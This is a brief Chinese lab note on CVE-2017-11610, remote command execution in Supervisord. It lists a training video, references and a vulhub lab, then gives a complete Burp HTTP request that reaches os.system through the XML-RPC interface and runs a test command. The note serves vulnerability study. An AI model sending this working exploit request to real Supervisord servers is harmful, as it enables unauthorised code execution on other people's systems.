CVE-2017-11610-Supervisord命令执行

实验环境和介绍

Supervisord 远程代码执行漏洞_视频教程_i春秋_培育信息时代的安全感! (ichunqiu.com)

参考

https://blogs.securiteam.com/index.php/archives/3348

https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html

https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610

burp

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>